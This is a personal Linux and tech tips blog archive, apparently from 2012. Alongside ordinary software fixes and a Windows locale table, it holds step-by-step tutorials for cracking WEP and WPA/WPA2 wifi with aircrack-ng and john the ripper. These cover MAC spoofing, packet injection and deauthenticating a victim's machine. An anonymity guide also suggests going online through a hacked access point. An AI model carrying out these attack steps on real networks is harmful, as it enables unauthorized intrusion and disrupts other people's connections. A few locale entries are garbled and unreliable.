Tuesday, 18 December 2012

Saturday, 1 December 2012

Tuesday, 13 November 2012

Monday, 12 November 2012

Scid vs PC installation guide - Ubuntu (Mint, Debian etc.)

Scid vs PC

Scid vs PC is definitely the best and most comprehensive chess software for Linux.  Unfortunately I struggled quite a bit to get it up and running.

Before I start: You might prefer to watch the video. Otherwise keep on reading.


Open a terminal and execute the following commands

sudo apt-get install auto-apt build-essential
sudo auto-apt update-local
sudo auto-apt update
sudo auto-apt updatedb

Now make sure you got both tcl8.5-dev and tk8.5-dev installed

sudo apt-get install tcl8.5-dev tcl8.5
sudo apt-get install tk8.5-dev tk8.5

Some users are reporting problems on Ubuntu 14.04.
sudo apt-get install tcl8.6-dev tcl8.6
sudo apt-get install tk8.6-dev tk8.6 libgcj15-dev

The 'x' refers to the current release: e.g. 4.9.tgz
download scid vs pc: http://sourceforge.net/projects/scidvspc/files/source/scid_vs_pc-4.9.tgz/download
tar -xzf scid_vs_pc-4.xx.tgz
cd scid_vs_pc-4.x 
sudo auto-apt run ./configure
sudo auto-apt run make
sudo auto-apt run make install
This should work. If you encounter any problems, please let me know.

Sunday, 11 November 2012

Friday, 19 October 2012

Wednesday, 17 October 2012

How to be anonymous on the internet (99-100%)

Updated: 06/2016

Summary: Tor Browser is not enough. This short tutorial will help you to significantly improve your security in only 15 minutes. 

Your online privacy is under attack. Government agencies (NSA, FBI etc.) and private companies (e.g. Google) are snooping on you. You will find a lot of tips on the web to achieve online anonymity, but most of it is useless.

The information below will give you a rock-solid setup in a reasonable amount of time. If you run into any problems post a comment and I will help you out.

It is possible to avoid being tracked, but to stay anonymous online you need a) a good setup and b) use your common sense.

My setup | User -> VPN -> Tor -> Internet

Using Tor alone is often not enough as a Harvard student had to learn when he emailed a bomb threat to campus officials to avoid having to write a final exam.  He was deanonymized by the fact that he was the only person using Tor on the campus network at the time the email was sent.

A VPN will hide the fact that you are using Tor from your Internet service provider or the network you are connected to. Choosing a VPN which can be trusted is extremely important. Companies such as Hide My Ass will reveal your identity as soon as someone knocks on their door. Money spent on these kind of operators is completely wasted money.

Step 1: VPN

Find a good VPN provider. I am using NordVPN. Their servers are operated under the jurisdiction of Panama, they have a no logs policy and it is possible to pay in Bitcoins for their services.

After you have signed up, install OpenVPN or use NordVPNs software and connect to the NordVPN network or the network of your VPN provider of choice.

A VPN will add a layer of protection regardless of whether you decide to proceed with Step 2 or not.

Step 2: Virtual Environment and Tor

Next, download VirtualBox and Whonix-Workstation/Gateway, which is a security-focused Linux distribution that tunnels ALL traffic through Tor. Install VirtualBox.

How to be anonymous online

Open VirtualBox and import the two (!) .ova files (Whonix) into VirtualBox. To do this go to File --> Import Appliance .

How to be anonymous online

First start Whonix-Gateway.

How to be anonymous online

As soon as you see the Desktop of Whonix-Gateway go back to VirtualBox and start Whonix-Workstation. 

Everything you do (i.e. surfing the deep web) is done on Whonix-Workstation.

How to be anonymous online

Important: USE your brain.

The best possible setup won't help you if you are careless and login to your normal Facebook/Gmail account while hiding behind VPNs and Tor. Do not use your everyday email address and do not use your everyday username for any anonymous activity online.

Unfortunately people make mistakes, but by using a virtual environment (Whonix) you can greatly mitigate that risk. It will help you separate your two identities and thus stay truly anonymous online.

If you have any questions or problems, please write a comment below.


EXTRA (You don't need this)
Please be aware that the following is of theoretical nature only. Breaking into networks without consent is illegal.

In theory the following setup would make it impossible to track somebody down: User --> hacked Wireless Access Point Router --> VPN --> Tor (Whonix) --> Internet

Don't use Windows, but a clean install of Debian instead. Make sure you enable full disk encryption (password should be a minimum of 30 characters).

Securely erase your HDD: Boot from an Ubuntu live CD. Install wipe (sudo apt-get install wipe) and wipe the hard disk drive.

·         WEP poses a significant security risk http://ubuntu-skype.blogspot.co.at/2012/08/how-to-crack-wep-with-aircrack-ng.html


Adversary most likely will change his mac address. This can be done via macchanger.  e.g. macchanger -r wlan0



Tuesday, 11 September 2012

Brute forcing WPA/WPA2 handshake with john the ripper

Please refer to this article for a tutorial on how to obtain a handshake.

How to crack WPA/WPA 2 with aircrack-ng (Backtrack 5) 

The limitation of a dictionary attack is that unless the password is in your dictionary file, your attack won't be successful. Another way to obtain the password is to brute force it with john the ripper. In theory it is possible to crack ANY password with this method, but it might take a million years to crack a full 128 ASCII characters password with your computer.

Ok, the command:

This was on Backtrack
/pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b (bssid) -w file.cap (wpa handshake file)

Debian
sudo apt-get install john
/usr/sbin/john --stdout --incremental:all | aircrack-ng -b (bssid) -w file.cap (wpa handshake file)


By default john will only try passwords with 8 characters or less. However, the minimum  pass-phrase length for WPA is 8.You need to edit the john.conf file to change the max length of the output.

"--inrecemtal:all" means that john will try all 128 ASCII characters, which will  take thousand of years to complete if the password has a proper lenght. You can also try -i:digits for numbers only or -i:alpha for a to z.

Good luck.

P.S.: You might be interested in this simple Linux dictionary password cracker written in python:  Article

Friday, 7 September 2012

Wednesday, 29 August 2012

How to increase your bandwidth in Win 7

Exceptionally a tip for Win 7. Windows uses up to 20% of the bandwidth, but you can change this with the following steps.

Run gpedit.msc

==> administrative settings ==>  network ==> qos packet scheduler ==> open LIMIT RESERVABLE BANDWIDTH

==> click on ENABLE and limit bandwidth to 0%.

Restart.

Thats it!

Tuesday, 28 August 2012

Linux Mint 13 - Black screen fix (live USB)

Recently I switched from Ubuntu to Linux Mint 13 on my HP mini netbook. Unfortunately I encountered a  'black-screen problem' similar to the one I already knew from Backtrack 5 (http://ubuntu-skype.blogspot.co.at/2012/07/backtrack-5-black-screen-after-startx.html ).

The solution was:

press TAB
add to the line  "..... ...... .... quiet splash "one of the following (depending on your chip set of your video card):

radeon.modeset=1
i915.modeset=1

If that does not work for you try to add "driver=intel". E.g. quiet splash i915.modeset=1 driver=intel.


I had success with that. Hope it works for you too!

Sunday, 19 August 2012

Tuesday, 14 August 2012

How to crack WEP with aircrack-ng (Backtrack)

Anybody should be able to do this. If you struggle with something, post a comment and I' ll get back to you.

Requirements
- Backtrack (or Linux with aircrack-ng installed)
- Virtual machine (e.g. Vmware or Virtualbox)
- USB Wifi adapter (you will need a wifi adapter which you can put in promiscuous mode. It wont work with your built-in notebook wifi card etc.) Buy this one: Alfa AWUS036H . It is cheap, reliable and works out of the box.

Commands
  1. airmon-ng stop wlan0
  2. ifconfig wlan0 down
  3. macchanger -m 00:11:22:33:44:55 wlan0
  4. ifconfig wlan0 up
  5. airmon-ng start wlan0 
  6. ifconfig mon0 down
  7. macchanger -r (random mac) mon0
  8. ifconfig mon0 up
  9. airodump-ng mon0 (scan for APs)
  10. Wait for a minute
  11. CTRL + C (stop scanning)
  12. Pick your own AP with WEP encryption
  13. airodump-ng -c (channel) -w (filename) —bssid (xx:xx:xx:xx:xx:xx) mon0
    • -w file, in which the data will be saved.
  14. —You need around 10k of data to successfully crack WEP—
  15. Open another console
  16. aireplay-ng -1 0 -a (BSSID) -e (ESSID) mon0
  17. Wait for ”Association succcessful”
  18. aireplay-ng -3 -b (BSSID) -e (ESSID) mon0 (starts the injection)
    • data in the other console should now  increase significantly
  19. open another console
  20. aircrack-ng (filename.cap) 
    •  path to the file from step 13. e.g. ~/Desktop/test.cap
  21. Wait for —Key Found—
  22. Enter Key without ‘:’.
This can be done in approx. 10 minutes. Have fun!

How to crack WPA/WPA 2 with aircrack-ng (Backtrack 5)

What you need

  • Backtrack (or Linux with aircrack-ng installed)
  • Virtual machine (e.g. Vmware or Virtualbox)
  • Password list
  • USB Wifi adapter capable of promiscuous mode: Alfa AWUS036H



Alright, fire up the terminal.

Commands

  1. airmon-ng
  2. airmon-ng start wlan0
  3. ifconfig mon0 down
  4. macchanger -m 00:11:22:33:44:55 mon0
  5. ifconfig mon0 up
  6. airodump-ng mon0 (let it scan for a minute)
  7. CTRL + C (stop)
  8. airodump-ng -c (channel) -w (filename. eg. wpa) —bssid (xx:xx:xx:xx:xx:xx) mon0

 Now, we need to deauthenticate a user's pc currently on the network (mac)

  1. open another console
  2. aireplay-ng --deauth 1 (just one!) -e (ESSID) -c  (victim's mac) mon0
  3. Wait for WPA handshake ==> airodump-ng
  4. —-all cracking can be done offline—-
  5. aircrack-ng -w (wordlist) file (eg. WPA-01.cap)
    • this is the file from step 8
Note: Success of attack depends on whether your word-list contains the password or not.

Video



Any problems? Ask!


Wednesday, 9 May 2012

''another skype instance may exist''

You wan't to login to skype, but you can't because you receive the following error: ''another skype instance may exist''.

This seems to be a common problem with Skype and Ubuntu.

Solution:

1) Open the terminal. (Dash Home: type: terminal)
2) Type ps aux
3) Look for the skype process and the process number
4) Type kill -9 xxxx (process nr. eg. 4557)
5) Start Skype and login.

Does this work for you? Leave me a comment!

Saturday, 3 March 2012

Locales for Windows XP and Windows Server 2003



0436 = "af;Afrikaans"
041C = "sq;Albanian"
0001 = "ar;Arabic"
0401 = "ar-sa;Arabic (Saudi Arabia)"
0801 = "ar-iq;Arabic (Iraq)"
0C01 = "ar-eg;Arabic (Egypt)"
1001 = "ar-ly;Arabic (Libya)"
1401 = "ar-dz;Arabic (Algeria)"
1801 = "ar-ma;Arabic (Morocco)"
1C01 = "ar-tn;Arabic (Tunisia)"
2001 = "ar-om;Arabic (Oman)"
2401 = "ar-ye;Arabic (Yemen)"
2801 = "ar-sy;Arabic (Syria)"
2C01 = "ar-jo;Arabic (Jordan)"
3001 = "ar-lb;Arabic (Lebanon)"
3401 = "ar-kw;Arabic (Kuwait)"
3801 = "ar-ae;Arabic (you.A.E.)"
3C01 = "ar-bh;Arabic (Bahrain)"
4001 = "ar-qa;Arabic (Qatar)"
042D = "eu;Basque"
0402 = "bg;Bulgarian"
0423 = "be;Belarusian"
0403 = "ca;Catalan"
0004 = "zh;Chinese"
0404 = "zh-tw;Chinese (Taiwan)"
0804 = "zh-cn;Chinese (China)"
0C04 = "zh-hk;Chinese (Hong Kong SAR)"
1004 = "zh-sg;Chinese (Singapore)"
041A = "hr;Croatian"
0405 = "cs;Czech"
0406 = "the;Danish"
0413 = "nl;Dutch (Netherlands)"
0813 = "nl-be;Dutch (Belgium)"
0009 = "en;English"
0409 = "en-us;English (United States)"
0809 = "en-gb;English (United Kingdom)"
0C09 = "en-au;English (Australia)"
1009 = "en-ca;English (Canada)"
1409 = "en-nz;English (New Zealand)"
1809 = "en-ie;English (Ireland)"
1C09 = "en-za;English (South Africa)"
2009 = "en-jm;English (Jamaica)"
2809 = "en-bz;English (Belize)"
2C09 = "en-tt;English (Trinidad)"
0425 = "et;Estonian"
0438 = "fo;Faeroese"
0429 = "fa;Farsi"
040B = "fi;Finnish"
040C = "fr;French (France)"
080C = "fr-be;French (Belgium)"
0C0C = "fr-ca;French (Canada)"
100C = "fr-ch;French (Switzerland)"
140C = "fr-lu;French (Luxembourg)"
043C = "gd;Gaelic"
0407 = "de;German (Germany)"
0807 = "de-ch;German (Switzerland)"
0C07 = "de-at;German (Austria)"
1007 = "de-lu;German (Luxembourg)"
1407 = "de-li;German (Liechtenstein)"
0408 = "el;Greek"
040D = "he;Hebrew"
0439 = "hi;Hindi"
040E = "hu;Hungarian"
040F = "is;Icelandic"
0421 = "in;Indonesian"
0410 = "it;Italian (Italy)"
0810 = "it-ch;Italian (Switzerland)"
0411 = "ja;Japanese"
0412 = "ko;Korean"
0426 = "lv;Latvian"
0427 = "lt;Lithuanian"
042F = "mk;FYRO Macedonian"
043E = "ms;Malay (Malaysia)"
043A = "mt;Maltese" 0414 = "no;Norwegian (Bokmal)"
0814 = "no;Norwegian (Nynorsk)"
0415 = "pl;Polish"
0416 = "pt-br;Portuguese (Brazil)"
0816 = "pt;Portuguese (Portugal)"
0417 = "rm;Rhaeto-Romanic"
0418 = "ro;Romanian"
0818 = "ro-mo;Romanian (Moldova)"
0419 = "ru;Russian"
0819 = "ru-mo;Russian (Moldova)"
0C1A = "sr;Serbian (Cyrillic)"
081A = "sr;Serbian (Latin)"
041B = "sk;Slovak"
0424 = "sl;Slovenian"
042E = "sb;Sorbian"
040A = "es;Spanish (Traditional Sort)"
080A = "es-mx;Spanish (Mexico)"
0C0A = "es;Spanish (International Sort)"
100A = "es-gt;Spanish (Guatemala)"
140A = "es-cr;Spanish (Costa Rica)"
180A = "es-pa;Spanish (Panama)"
1C0A = "es-do;Spanish (Dominican Republic)"
200A = "es-ve;Spanish (Venezuela)"
240A = "es-co;Spanish (Colombia)"
280A = "es-pe;Spanish (Peru)"
2C0A = "es-ar;Spanish (Argentina)"
300A = "es-ec;Spanish (Ecuador)"
340A = "es-cl;Spanish (Chile)"
380A = "es-uy;Spanish (Uruguay)"
3C0A = "es-py;Spanish (Paraguay)"
400A = "es-bo;Spanish (Bolivia)"
440A = "es-sv;Spanish (El Salvador)"
480A = "es-hn;Spanish (Honduras)"
4C0A = "es-ni;Spanish (Nicaragua)"
500A = "es-pr;Spanish (Puerto Rico)"
0430 = "sx;Sutu"
041D = "sv;Swedish"
081D = "sv-fi;Swedish (Finland)"
041E = "th;Thai"
0431 = "ts;Tsonga"
0432 = "tn;Tswana"
041F = "tr;Turkish"
0422 = "uk;Ukrainian"
0420 = "your;Urdu"
042A = "vi;Vietnamese"
0434 = "xh;Xhosa"
043D = "ji;Yiddish"
0435 = "zu;Zulu"

Thursday, 2 February 2012